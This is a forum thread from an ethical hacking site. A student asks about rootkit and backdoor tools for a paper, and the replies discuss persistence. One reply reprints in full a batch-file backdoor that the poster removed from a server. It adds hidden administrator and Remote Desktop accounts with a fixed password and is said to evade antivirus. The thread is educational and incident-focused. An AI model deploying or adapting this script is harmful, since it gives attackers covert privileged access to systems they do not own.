Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.






Lost Password?
No account yet? Register
Who's Online
We have 28 guests and 2 members online
 
Advertisement

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Malwarearrow Query on possible hacking tools
EH-Net
May 24, 2013, 05:21:31 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
  Print  
Author Topic: Query on possible hacking tools  (Read 448 times)
0 Members and 1 Guest are viewing this topic.
sheepboi
Newbie
*
Offline Offline

Posts: 1


View Profile
« on: April 25, 2013, 02:17:03 PM »

Hi i am new to the forum and relatively new to security.  I have to write a paper on an attack that affected a business not too long ago and i need a little bit of help. 

As i am not very familiar with hacking tools and exploits used my cyber-criminals i need guidance on what tools could have been utilized to cause the following:

- Alter system tools to hide presence on network (rootkit),
- Create a backdoor Trojan as a means of accessing a network.

I know of a few such as armatage and metasploit but as they are pretty comprehensive and i haven't been able to find information that would indicate they could do these things.

Any direction would be brilliant!

Thanks guys.
Logged
3xban
Hero Member
*****
Offline Offline

Posts: 608


View Profile WWW
« Reply #1 on: April 25, 2013, 05:36:24 PM »

It is a very general question and doing a google search for rootkits backdoor trojan might send you in the right direction.  Metasploit could be a good resource but you need to know how to work your way through it.  Also what type of rootkit?  Master boot record?  The rootkit is typically used for persistence as it tends to sit below where traditional AV looks.  It will continue to replace live malware if someone removes it and reboots the device.  There are other uses for rootkits but they depend on what the attacker wants to accomplish.  The key to backdoors is the ability for the attacker to continually connect.  So lots to consider.
Logged

Certs: GCWN
(@)Dewser
Krotch
Newbie
*
Offline Offline

Posts: 1


View Profile
« Reply #2 on: April 29, 2013, 05:07:08 AM »

Well the last "backdoor" that I removed from a server was actually pretty simple. It was a batch file that had a hidden name and a hidden file extension. It was pretty invisible to casual searching. It was set as a log on script. Basically it referenced copies of some of the windows utilities that were renamed and located in system32\drivers\etc.

the script went like this:

@cd %systemroot%\system32\drivers\etc\
@1 localgroup "Remote Desktop Users" SUPPORT_388945a0 /add
@1 localgroup "Remote Desktop Users" guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes


Pretty basic, but it did the job of reactivating the accounts and resetting the passwords. Slipped by the AV pretty easily.
Logged
Pages: [1]   Go Up
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com
Valid XHTML 1.0! Valid CSS!
Page created in 0.071 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.